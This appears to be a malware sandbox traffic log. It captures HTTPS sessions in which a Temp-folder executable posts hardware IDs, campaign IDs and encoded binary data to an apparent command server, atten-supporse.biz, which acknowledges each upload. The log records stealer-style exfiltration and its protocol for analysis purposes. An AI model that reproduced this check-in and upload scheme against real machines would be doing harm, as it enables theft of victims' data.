                                                                                                                                          2024-12-08 17:06:19 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 26 6a 3d
                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--Chuvak&j=
                                                                                                                                          2024-12-08 17:06:19 UTC1011INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:19 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=rt8eonervot9kbd3bvoj17cd3j; expires=Thu, 03-Apr-2025 10:52:58 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9V1ETYXR5G30mAjPN5ukHxG3SSZ9uTfBA371PicYtRZPRmfnDIHX7Q1sGsrPntvJSXoQDjwkN8NZCWa02WsMIPLgoo8hWYHsduZ8O1iLxOs5vYGjDP5sxfMMMYvpCDtfJ%2Fudss%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee5866b84742ab-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1737&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=950&delivery_rate=1591280&cwnd=199&unsent_bytes=0&cid=0cfe9498d39b5292&ts=907&x=0"
                                                                                                                                          2024-12-08 17:06:19 UTC358INData Raw: 34 39 31 63 0d 0a 45 64 4e 2b 37 6f 32 54 6c 38 64 32 6b 39 66 55 31 67 65 44 69 47 4c 64 4a 67 53 45 64 4f 4d 63 69 35 6a 59 62 70 4c 32 71 51 64 71 38 51 6a 4d 74 36 65 37 35 51 58 32 39 65 36 69 64 66 62 74 54 76 39 48 59 4b 5a 4f 68 58 33 6e 36 37 31 43 73 49 44 45 4a 53 75 31 48 34 4c 2b 39 72 76 6c 45 2b 76 31 37 6f 31 38 6f 65 30 4d 2f 78 77 6d 34 52 36 42 66 65 66 36 75 51 58 39 68 73 56 6b 65 62 38 5a 68 75 6a 77 38 36 59 61 2f 72 4b 78 73 32 62 70 35 67 75 77 54 6d 6d 6d 57 4d 46 35 38 62 72 69 54 4e 2b 54 33 57 5a 63 73 67 32 46 72 2b 36 37 76 46 54 32 75 66 62 73 4a 65 4c 74 41 4c 46 41 59 4f 38 63 69 33 54 76 2b 37 77 45 34 70 2f 50 62 33 6d 78 47 6f 66 69 2b 65 65 72 45 50 6d 35 74 37 6c 6d 6f 61 52 41 75 46 77 6d 76 6c 62 53 54 4f 72 72 71
                                                                                                                                          Data Ascii: 491cEdN+7o2Tl8d2k9fU1geDiGLdJgSEdOMci5jYbpL2qQdq8QjMt6e75QX29e6idfbtTv9HYKZOhX3n671CsIDEJSu1H4L+9rvlE+v17o18oe0M/xwm4R6Bfef6uQX9hsVkeb8Zhujw86Ya/rKxs2bp5guwTmmmWMF58briTN+T3WZcsg2Fr+67vFT2ufbsJeLtALFAYO8ci3Tv+7wE4p/Pb3mxGofi+eerEPm5t7lmoaRAuFwmvlbSTOrrq
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 48 50 71 2b 73 36 5a 75 36 4f 63 4e 76 30 6c 73 36 52 57 42 65 65 50 77 74 51 62 30 6d 63 5a 6a 63 37 46 63 77 71 2f 32 37 65 56 4d 73 5a 61 7a 70 47 4c 74 2f 45 4b 46 42 48 6d 6f 44 38 46 35 35 62 72 69 54 50 69 52 79 47 5a 34 76 68 2b 45 35 4f 50 31 74 78 4c 38 73 4b 53 79 59 4f 2f 67 41 36 31 4f 61 4f 41 56 69 48 58 67 2f 37 30 49 73 4e 71 4c 59 6d 76 78 52 4d 7a 4f 2f 50 36 70 48 75 61 31 39 71 73 72 2b 4b 6f 48 73 77 51 2b 70 68 4b 41 65 75 6a 2b 74 41 4c 30 6d 4d 31 72 66 72 34 61 68 75 2f 32 2f 36 30 63 38 4c 69 39 75 32 58 6b 35 77 53 35 53 47 66 6a 56 73 38 2b 37 75 4c 36 56 4c 43 36 7a 47 5a 68 38 79 6d 50 34 66 2f 79 73 31 54 75 2b 36 2f 30 59 75 32 71 57 50 39 4b 59 2b 6b 45 67 47 7a 73 39 4b 67 41 39 5a 4c 47 5a 6e 32 78 47 59 76 69 2f 2f 4f
                                                                                                                                          Data Ascii: HPq+s6Zu6OcNv0ls6RWBeePwtQb0mcZjc7Fcwq/27eVMsZazpGLt/EKFBHmoD8F55briTPiRyGZ4vh+E5OP1txL8sKSyYO/gA61OaOAViHXg/70IsNqLYmvxRMzO/P6pHua19qsr+KoHswQ+phKAeuj+tAL0mM1rfr4ahu/2/60c8Li9u2Xk5wS5SGfjVs8+7uL6VLC6zGZh8ymP4f/ys1Tu+6/0Yu2qWP9KY+kEgGzs9KgA9ZLGZn2xGYvi//O
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 36 2f 30 59 75 32 71 57 50 39 4a 62 75 4d 54 6a 6e 2f 6a 39 4c 38 47 2f 4a 7a 46 5a 6d 47 2b 47 49 7a 6a 2b 66 2b 6f 47 76 57 39 76 37 39 75 35 2b 6f 42 74 51 51 6f 70 68 47 5a 50 72 47 36 6a 67 76 38 6d 63 51 6e 52 72 49 53 67 75 6a 6e 74 62 70 61 36 50 57 78 75 43 57 35 71 67 79 32 52 47 33 73 45 6f 46 35 35 50 2b 35 43 2f 4f 5a 7a 47 39 39 74 68 69 41 35 76 7a 7a 70 52 50 31 73 4b 53 78 62 4f 33 6d 51 50 45 45 59 66 35 57 32 54 37 47 2f 61 77 50 33 35 66 61 62 44 4f 75 55 70 57 76 39 76 6e 6c 54 4c 47 79 73 37 78 75 35 2b 49 41 72 55 46 6f 37 52 65 4c 65 4f 6a 33 74 67 72 77 6c 63 74 6a 66 37 45 62 69 2f 33 6a 38 4b 4d 47 2b 2f 58 34 39 47 4c 35 71 6c 6a 2f 63 6e 62 78 42 35 63 38 33 50 6d 30 41 76 65 43 69 33 6f 39 71 46 79 4c 34 37 47 74 35 52 2f 78
                                                                                                                                          Data Ascii: 6/0Yu2qWP9JbuMTjn/j9L8G/JzFZmG+GIzj+f+oGvW9v79u5+oBtQQophGZPrG6jgv8mcQnRrISgujntbpa6PWxuCW5qgy2RG3sEoF55P+5C/OZzG99thiA5vzzpRP1sKSxbO3mQPEEYf5W2T7G/awP35fabDOuUpWv9vnlTLGys7xu5+IArUFo7ReLeOj3tgrwlctjf7Ebi/3j8KMG+/X49GL5qlj/cnbxB5c83Pm0AveCi3o9qFyL47Gt5R/x
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 37 7a 36 67 32 37 53 47 4c 75 48 59 73 2b 70 37 71 39 46 4c 44 4d 69 31 42 2b 76 68 79 50 2b 62 48 71 36 77 32 78 73 72 72 30 50 61 48 6d 44 72 39 4c 61 75 6f 64 69 58 2f 6c 39 4c 30 4a 2b 5a 7a 44 64 33 4b 31 46 49 33 68 2f 76 53 68 45 66 53 78 73 62 42 6a 37 71 70 4f 2f 30 4e 2b 70 6b 37 42 55 63 37 50 2b 43 33 4b 31 4e 51 72 61 76 45 62 67 4b 2b 70 74 61 6b 58 2f 62 32 35 73 6d 7a 74 34 41 6d 30 53 47 33 69 47 6f 68 37 37 2f 75 2f 43 66 47 51 78 32 39 31 73 68 2b 44 34 50 37 39 35 56 71 78 73 71 37 30 50 61 48 50 46 37 52 4b 59 4b 59 4a 7a 32 65 70 2f 62 5a 4d 71 4e 54 48 62 48 57 33 47 59 44 75 39 2f 32 67 48 50 57 30 73 4c 4a 6d 37 75 34 46 76 6b 74 69 36 68 69 4c 66 2b 6a 32 73 51 50 37 6b 59 73 72 4d 37 59 45 7a 4c 65 78 78 4b 59 43 35 71 57 36 39
                                                                                                                                          Data Ascii: 7z6g27SGLuHYs+p7q9FLDMi1B+vhyP+bHq6w2xsrr0PaHmDr9LauodiX/l9L0J+ZzDd3K1FI3h/vShEfSxsbBj7qpO/0N+pk7BUc7P+C3K1NQravEbgK+ptakX/b25smzt4Am0SG3iGoh77/u/CfGQx291sh+D4P795Vqxsq70PaHPF7RKYKYJz2ep/bZMqNTHbHW3GYDu9/2gHPW0sLJm7u4Fvkti6hiLf+j2sQP7kYsrM7YEzLexxKYC5qW69
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 41 75 46 77 6d 76 6c 61 76 64 66 72 74 75 51 4c 37 67 74 41 6c 62 50 38 46 7a 4f 6a 39 74 66 31 55 38 72 36 39 73 47 58 74 36 67 53 79 52 48 54 70 45 59 5a 33 34 75 69 77 43 2f 65 66 77 32 35 38 74 77 36 41 34 65 50 77 74 77 61 78 2b 2f 61 7a 66 61 47 79 51 49 6c 44 64 76 59 56 77 30 2f 2f 2b 61 77 48 2f 5a 69 4c 65 6a 32 6f 58 49 76 6a 73 61 33 6c 45 76 36 38 74 62 74 6b 36 4f 59 4e 75 6b 31 6a 35 78 43 46 64 4f 50 36 76 41 72 78 6b 63 46 6d 63 72 73 56 69 2b 66 32 39 72 64 55 76 2f 57 78 72 43 57 35 71 69 6d 34 56 6d 6a 32 56 70 34 77 38 4c 71 39 41 4c 44 4d 69 32 46 35 76 68 69 4c 34 2f 66 77 6f 78 6e 77 75 72 65 30 61 75 58 68 43 62 6c 46 61 2b 4d 62 68 57 7a 6a 38 62 55 41 2b 5a 6a 47 4a 54 33 78 47 35 53 76 71 62 57 55 47 66 2b 37 73 61 49 6c 2f 71
                                                                                                                                          Data Ascii: AuFwmvlavdfrtuQL7gtAlbP8FzOj9tf1U8r69sGXt6gSyRHTpEYZ34uiwC/efw258tw6A4ePwtwax+/azfaGyQIlDdvYVw0//+awH/ZiLej2oXIvjsa3lEv68tbtk6OYNuk1j5xCFdOP6vArxkcFmcrsVi+f29rdUv/WxrCW5qim4Vmj2Vp4w8Lq9ALDMi2F5vhiL4/fwoxnwure0auXhCblFa+MbhWzj8bUA+ZjGJT3xG5SvqbWUGf+7saIl/q
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 61 2b 55 51 68 33 58 6c 36 4c 4d 4d 38 35 2b 4c 4b 7a 4f 32 42 4d 79 33 73 64 61 79 41 76 75 79 75 71 4a 75 34 4f 6b 57 73 6c 51 6d 71 46 61 51 65 66 69 36 34 68 72 67 67 38 78 36 50 61 68 63 69 2b 4f 78 72 65 55 53 2b 4c 4f 78 73 6d 76 7a 37 77 61 77 53 32 2f 76 45 6f 6c 39 36 66 36 2b 43 2f 57 58 78 32 35 30 73 68 4f 49 35 76 2f 38 71 6c 53 2f 39 62 47 73 4a 62 6d 71 49 61 52 48 61 75 74 57 6e 6a 44 77 75 72 30 41 73 4d 79 4c 61 58 32 30 48 49 62 70 39 66 43 6a 48 76 53 31 76 62 64 71 35 65 77 45 73 45 52 74 37 78 65 48 65 2b 50 78 76 41 48 7a 6b 73 30 6c 50 66 45 62 6c 4b 2b 70 74 59 55 50 2f 4c 6d 78 39 48 71 76 38 30 43 34 53 43 61 2b 56 6f 70 79 37 66 32 36 41 66 4f 63 7a 6d 46 35 74 42 79 45 2f 66 6e 31 6f 67 62 6a 74 62 2b 78 61 65 4c 71 42 4c 6c
                                                                                                                                          Data Ascii: a+UQh3Xl6LMM85+LKzO2BMy3sdayAvuyuqJu4OkWslQmqFaQefi64hrgg8x6Pahci+OxreUS+LOxsmvz7wawS2/vEol96f6+C/WXx250shOI5v/8qlS/9bGsJbmqIaRHautWnjDwur0AsMyLaX20HIbp9fCjHvS1vbdq5ewEsERt7xeHe+PxvAHzks0lPfEblK+ptYUP/Lmx9Hqv80C4SCa+Vopy7f26AfOczmF5tByE/fn1ogbjtb+xaeLqBLl
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 59 35 76 31 37 72 69 46 63 37 55 77 48 4e 30 6f 52 2b 61 35 50 7a 35 74 43 71 78 37 65 4c 6d 4e 37 4f 34 55 71 41 45 65 64 6c 59 77 58 2b 70 6f 6f 4d 56 73 49 4b 4c 50 53 48 2f 58 4a 36 76 71 62 58 69 46 2b 4f 6e 73 4c 64 7a 34 71 30 2b 67 57 4e 77 37 42 47 52 65 66 37 31 2b 6b 4b 77 6d 34 73 39 53 76 45 56 69 2f 54 67 34 36 67 45 39 76 57 4a 2b 69 58 35 71 6c 6a 2f 63 57 58 6f 47 49 5a 6f 2b 4c 65 64 47 76 71 54 32 32 4a 6b 76 6c 7a 43 72 2f 65 31 2f 55 65 2f 39 62 4b 6c 4a 62 6d 36 55 75 51 52 4e 62 46 47 30 32 47 6e 34 2f 6f 61 73 4d 79 5a 4b 7a 4f 6a 58 4e 53 76 74 76 61 33 42 76 65 32 6f 4c 63 69 33 39 51 6e 70 55 6c 67 38 51 65 2f 51 4f 37 67 74 77 72 6e 68 59 64 77 63 4c 38 53 69 2f 6d 78 75 2b 55 62 73 65 32 50 39 43 32 68 31 55 37 2f 58 43 61 2b
                                                                                                                                          Data Ascii: Y5v17riFc7UwHN0oR+a5Pz5tCqx7eLmN7O4UqAEedlYwX+pooMVsIKLPSH/XJ6vqbXiF+OnsLdz4q0+gWNw7BGRef71+kKwm4s9SvEVi/Tg46gE9vWJ+iX5qlj/cWXoGIZo+LedGvqT22JkvlzCr/e1/Ue/9bKlJbm6UuQRNbFG02Gn4/oasMyZKzOjXNSvtva3Bve2oLci39QnpUlg8Qe/QO7gtwrnhYdwcL8Si/mxu+Ubse2P9C2h1U7/XCa+
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 6d 6f 70 55 4c 70 31 4e 30 6c 4b 2b 4e 53 7a 50 32 78 72 65 56 54 38 71 65 6b 73 6d 62 33 36 55 65 42 65 6b 48 6f 45 59 42 6f 2b 65 32 31 4d 73 36 42 79 47 74 39 74 67 71 64 72 37 2b 31 71 6c 53 70 6a 50 62 38 4a 64 36 6b 51 4b 63 45 50 71 59 6a 67 6e 44 6e 2f 61 77 64 76 62 50 46 59 6e 4b 6e 44 4a 76 67 73 62 76 6c 45 72 48 74 35 50 6f 6c 35 66 74 41 35 78 51 30 76 55 50 53 4b 62 6d 6f 70 55 4c 70 31 4e 30 6c 4b 2b 4e 53 7a 50 32 78 72 65 56 54 38 71 65 6b 73 6d 62 33 36 55 65 42 65 6b 48 6f 45 59 42 6f 2b 65 32 31 51 39 36 69 36 6c 74 4e 70 42 2b 43 34 66 62 6a 74 46 53 2f 39 62 6e 30 50 64 69 71 53 50 39 37 4b 4b 59 4f 77 53 61 70 7a 37 6b 43 2f 70 50 64 64 44 36 57 45 6f 76 75 35 2b 57 79 47 37 36 62 67 4a 55 6c 72 36 6f 47 2f 78 77 30 71 46 61 46 62
                                                                                                                                          Data Ascii: mopULp1N0lK+NSzP2xreVT8qeksmb36UeBekHoEYBo+e21Ms6ByGt9tgqdr7+1qlSpjPb8Jd6kQKcEPqYjgnDn/awdvbPFYnKnDJvgsbvlErHt5Pol5ftA5xQ0vUPSKbmopULp1N0lK+NSzP2xreVT8qeksmb36UeBekHoEYBo+e21Q96i6ltNpB+C4fbjtFS/9bn0PdiqSP97KKYOwSapz7kC/pPddD6WEovu5+WyG76bgJUlr6oG/xw0qFaFb
                                                                                                                                          2024-12-08 17:06:19 UTC1369INData Raw: 50 73 71 58 64 5a 6e 4f 2f 47 38 79 68 73 65 33 6c 54 4c 47 59 70 4c 4e 31 34 71 70 4f 2f 30 67 6d 76 6c 61 4d 62 4f 37 71 75 55 44 33 6a 73 77 6c 62 50 38 46 7a 50 6d 78 72 66 5a 61 73 61 66 32 37 43 57 6d 35 41 32 2b 52 32 6a 6c 42 4a 4e 34 36 75 79 35 53 38 36 71 35 6e 64 30 6f 52 2f 4f 33 76 7a 78 73 77 48 79 70 62 47 4b 57 38 7a 34 42 36 39 48 4a 4d 6f 52 6a 48 4c 58 78 49 30 64 39 34 53 4a 51 33 43 6e 48 38 79 68 73 65 33 6c 54 4c 47 59 70 4c 4e 31 34 71 67 73 75 45 6c 71 70 67 6e 50 5a 36 6e 73 2b 6c 53 6a 32 6f 74 33 4d 2b 6c 63 79 2b 7a 6a 35 36 4d 58 35 37 62 78 69 6c 76 4d 2b 41 65 76 52 79 54 58 47 34 56 6f 2f 50 6d 71 43 38 36 71 35 6e 64 30 6f 52 2f 4f 79 73 75 33 6c 41 4c 79 74 62 69 7a 4a 61 2b 71 47 50 38 63 4a 73 73 45 68 6d 37 71 75 4a
                                                                                                                                          Data Ascii: PsqXdZnO/G8yhse3lTLGYpLN14qpO/0gmvlaMbO7quUD3jswlbP8FzPmxrfZasaf27CWm5A2+R2jlBJN46uy5S86q5nd0oR/O3vzxswHypbGKW8z4B69HJMoRjHLXxI0d94SJQ3CnH8yhse3lTLGYpLN14qgsuElqpgnPZ6ns+lSj2ot3M+lcy+zj56MX57bxilvM+AevRyTXG4Vo/PmqC86q5nd0oR/Oysu3lALytbizJa+qGP8cJssEhm7quJ


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449795172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:21 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=2IV6KEL089
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 18116
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:21 UTC15331OUTData Raw: 2d 2d 32 49 56 36 4b 45 4c 30 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39 0d 0a 2d 2d 32 49 56 36 4b 45 4c 30 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 49 56 36 4b 45 4c 30 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 0d 0a 2d 2d 32 49 56 36 4b 45 4c 30 38 39 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                          Data Ascii: --2IV6KEL089Content-Disposition: form-data; name="hwid"F663419F2A517DE6D599DAF6C95D6029--2IV6KEL089Content-Disposition: form-data; name="pid"2--2IV6KEL089Content-Disposition: form-data; name="lid"H8NgCl--Chuvak--2IV6KEL089Content
                                                                                                                                          2024-12-08 17:06:21 UTC2785OUTData Raw: 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6
                                                                                                                                          Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                          2024-12-08 17:06:22 UTC1022INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:22 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=5asf8rtv3amfb40o9vq9ardub1; expires=Thu, 03-Apr-2025 10:53:01 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rg6ghvdNvr%2BDbKHYPLDSnShWrttxaZXDaB%2BTOsduKFlxkQAogjBUDB%2BIWMikurunmMvBSeDnomATz2ftNNtlW4z3C3i6u4hIuAXNq7TuX%2FAqpsEgtuc3VwPqLRO6fxeKAVZLjBY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58754e19c44a-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1479&rtt_var=570&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19072&delivery_rate=1893644&cwnd=228&unsent_bytes=0&cid=56f3a7359cae5ebc&ts=1082&x=0"
                                                                                                                                          2024-12-08 17:06:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                          2024-12-08 17:06:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449802172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:23 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=9L2NQWWV
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8725
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:23 UTC8725OUTData Raw: 2d 2d 39 4c 32 4e 51 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39 0d 0a 2d 2d 39 4c 32 4e 51 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 4c 32 4e 51 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 0d 0a 2d 2d 39 4c 32 4e 51 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                          Data Ascii: --9L2NQWWVContent-Disposition: form-data; name="hwid"F663419F2A517DE6D599DAF6C95D6029--9L2NQWWVContent-Disposition: form-data; name="pid"2--9L2NQWWVContent-Disposition: form-data; name="lid"H8NgCl--Chuvak--9L2NQWWVContent-Disposi
                                                                                                                                          2024-12-08 17:06:24 UTC1018INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:24 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=b5ujm59g33vgprvfn9hs8h5k7o; expires=Thu, 03-Apr-2025 10:53:03 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tL%2FK74VtSZNVndYevhSy4maPMqonWPdVLyX3IHenbhJqhWUE%2B7%2BgwFpABczJyrlu2t8hQDkkNRkkggv2dtcxxCTXZDvJVES0Wy3oVqzDqUULBkpJ1N0UDyQvIyWcFNB8P5oO9LY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58843efb4401-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1627&rtt_var=622&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9656&delivery_rate=1743283&cwnd=233&unsent_bytes=0&cid=a2dc7b49ab563bf5&ts=1139&x=0"
                                                                                                                                          2024-12-08 17:06:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                          2024-12-08 17:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449810172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:26 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=PHSWT3AU2H4FCXW15YW
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 20444
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:26 UTC15331OUTData Raw: 2d 2d 50 48 53 57 54 33 41 55 32 48 34 46 43 58 57 31 35 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39 0d 0a 2d 2d 50 48 53 57 54 33 41 55 32 48 34 46 43 58 57 31 35 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 48 53 57 54 33 41 55 32 48 34 46 43 58 57 31 35 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 43 68
